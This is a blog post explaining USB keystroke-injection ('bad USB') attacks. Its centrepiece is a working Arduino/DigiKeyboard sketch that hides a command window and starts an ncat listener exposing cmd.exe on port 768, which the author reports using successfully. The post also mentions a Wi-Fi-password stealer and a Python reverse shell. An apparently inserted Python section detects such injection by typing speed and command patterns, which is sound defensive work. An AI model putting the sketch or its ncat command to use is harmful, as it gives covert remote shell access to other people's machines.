Tuesday, August 9, 2022

USB as an Attack Vector in Cyber Security

USB thumb drives can be used by hackers to attack their target machines. The common terms for such a device are "rubber ducky" or "bad USB". A few companies sell this kind of device, and the price ranges between 2000 and 6000 pesos. There are several ways to build one, and the simplest is to use an Arduino. There are many variants of Arduino, from small to ultra small like the Femtoduino (the smallest Arduino, I think). To use this device, hackers usually insert it into the target machine's USB port when no one else is watching, and it takes less than 10 seconds, sometimes only 3 seconds.

The Arduino can be programmed to mimic a keyboard, which means that once it is inserted into a USB port it is recognized by the computer as a keyboard. And as we all know, Windows machines fully trust keyboards, so Windows lets it run without restriction. To prove this, I experimented with an ordinary USB memory stick by following a guide I found on YouTube, but even with my antivirus turned off, Windows did not trust it. So I did a little experiment to see whether what all those people on YouTube were saying was true, and immediately ordered the cheapest Arduino on Shopee (an ATtiny85 board cost only 101 pesos plus a 60 peso delivery charge). When it arrived, I uploaded the following program (called a sketch in the Arduino world). As its price suggests, the bad USB I used for my experiment is not as sophisticated as those sold as bad USB devices on the market.

#include "DigiKeyboard.h"
#define KEY_DOWN 0x51  // Keyboard Down Arrow (USB HID usage code)
#define KEY_ENTER 0x28 // Return/Enter key

void setup() {
  pinMode(1, OUTPUT); // LED on Model A
}

void loop() {

  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);  // send an empty report so the host finishes enumerating the keyboard
  DigiKeyboard.delay(3000);

  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R: open the Run dialog
  DigiKeyboard.delay(100);

  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); // smallest cmd window possible
  DigiKeyboard.delay(500);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); // Alt+Space: window menu
  DigiKeyboard.sendKeyStroke(KEY_M);                   // go to Move
  for (int i = 0; i < 100; i++)
    {
      DigiKeyboard.sendKeyStroke(KEY_DOWN);            // push the window off the bottom of the screen
    }
  DigiKeyboard.sendKeyStroke(KEY_ENTER); // detach from moving
  DigiKeyboard.delay(100);
  DigiKeyboard.println("ncat -lp 768 -vv -e cmd.exe");
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW);
  DigiKeyboard.delay(5000);
} // closing brace missing in the original listing; loop() repeats after this delay

This program opens a command prompt window, drags it downward so that other people will not see it, and creates a reverse shell on port 768 if the device is inserted into a Windows machine.

And on my PC, I just type "ncat <ip> 768".

My experiment was successful.
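The defender's counterpart to the sketch above, as an added example that is not code from this post: an endpoint agent can tell a keystroke-injection device from a human typist by its cadence (a DigiKeyboard sketch emits each character in a few milliseconds, far faster and more regularly than fingers can) and by what the burst types (a console shrunk with "mode con:" and an ncat listener that exposes cmd.exe with -e). The keystroke events, device ids and thresholds below are constructed or assumed for illustration, not captured from a real device.

```python
import re
from dataclasses import dataclass


@dataclass
class KeyEvent:
    t_ms: int      # milliseconds since the device was attached
    device: str    # device instance id; all ids in this file are constructed
    char: str      # character produced; "\n" stands for Enter


# Assumed thresholds (tune per environment). Sustained human typing stays well
# below 15 keys/s, and a human cannot produce many consecutive gaps under 30 ms;
# the DigiKeyboard sketch above types each character in a few milliseconds.
MAX_HUMAN_KEYS_PER_SEC = 15.0
FAST_GAP_MS = 30
MAX_FAST_GAP_FRACTION = 0.8
MIN_BURST_KEYS = 10

# Content signals taken from the sketch on this page: a console shrunk to hide
# it, and an ncat/nc listener that hands out a shell with -e.
SUSPICIOUS_TEXT = [
    (re.compile(r"\bmode\s+con:?\s*cols=\d+\s+lines=\d+", re.I),
     "console window shrunk to hide it"),
    (re.compile(r"\b(?:ncat|nc)\b.*\s-l\S*.*\s-e\s", re.I),
     "netcat listener exposing a shell via -e"),
]


def by_device(events):
    """Group events per device, ordered by time."""
    groups = {}
    for ev in sorted(events, key=lambda e: e.t_ms):
        groups.setdefault(ev.device, []).append(ev)
    return groups


def cadence(events):
    """Return (keys per second, fraction of inter-key gaps under FAST_GAP_MS)."""
    gaps = [b.t_ms - a.t_ms for a, b in zip(events, events[1:])]
    if not gaps:
        return 0.0, 0.0
    span_s = (events[-1].t_ms - events[0].t_ms) / 1000.0
    rate = len(gaps) / span_s if span_s > 0 else float("inf")
    fast = sum(1 for g in gaps if g < FAST_GAP_MS) / len(gaps)
    return rate, fast


def typed_text(events):
    return "".join(ev.char for ev in events)


def assess(events):
    """One finding per device: which signals fired and why."""
    findings = []
    for device, evs in by_device(events).items():
        reasons = []
        if len(evs) >= MIN_BURST_KEYS:
            rate, fast = cadence(evs)
            if rate > MAX_HUMAN_KEYS_PER_SEC:
                reasons.append(f"typing rate {rate:.0f} keys/s exceeds human range")
            if fast >= MAX_FAST_GAP_FRACTION:
                reasons.append(f"{fast:.0%} of inter-key gaps under {FAST_GAP_MS} ms")
        for line in typed_text(evs).splitlines():
            for pattern, why in SUSPICIOUS_TEXT:
                if pattern.search(line):
                    reasons.append(f"{why}: {line.strip()!r}")
        findings.append({"device": device, "keys": len(evs),
                         "suspicious": bool(reasons), "reasons": reasons})
    return findings


def build_burst(device, text, start_ms, gap_ms, pause_after_enter_ms=0):
    """Construct sample events typing `text` at a fixed gap (sample data only)."""
    events, t = [], start_ms
    for ch in text:
        events.append(KeyEvent(t, device, ch))
        t += gap_ms + (pause_after_enter_ms if ch == "\n" else 0)
    return events


def constructed_sample():
    """Constructed data: a human-paced burst and a machine-paced burst."""
    human_gaps = [180, 240, 95, 310, 160, 220, 140, 400, 210, 130, 260]
    human, t = [], 1000
    for ch, gap in zip("hello world\n", human_gaps + [0]):
        human.append(KeyEvent(t, "HID\\VID_HUMAN&PID_0001", ch))
        t += gap
    injected = build_burst(
        "HID\\VID_XXXX&PID_YYYY",   # placeholder id, not any real device's
        "cmd /k mode con: cols=15 lines=1\nncat -lp 768 -vv -e cmd.exe\n",
        start_ms=3000, gap_ms=8, pause_after_enter_ms=600)
    return human + injected


if __name__ == "__main__":
    for f in assess(constructed_sample()):
        print(f["device"], "SUSPICIOUS" if f["suspicious"] else "ok", f["reasons"])
```

The fast-gap fraction is deliberately used instead of a plain variance measure: the sketch pauses for a full second between its two lines, which would make the timing look irregular on average, but every keystroke inside each line still arrives faster than a human can physically repeat a key. On the constructed sample the human device produces no finding, while the injected burst is flagged on all four signals.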

You may find the original program on GitHub; I got the idea from YouTube. The original program was meant to steal the Wi-Fi password and send it to the internet (a webhook site). But it takes around 30 seconds to accomplish its task and may not work on other Windows PCs (it does not work on my Gole mini PC), while the program I uploaded takes less than 10 seconds and, as long as netcat is installed on that PC, it will work. If netcat is not installed but Python is, a Python program that creates a reverse shell can be used instead.

This is for educational purposes only. You could go to jail if you use this to actually steal something or do something illegal. It is one of the tools used by hackers, but also by ethical hackers and penetration testers.
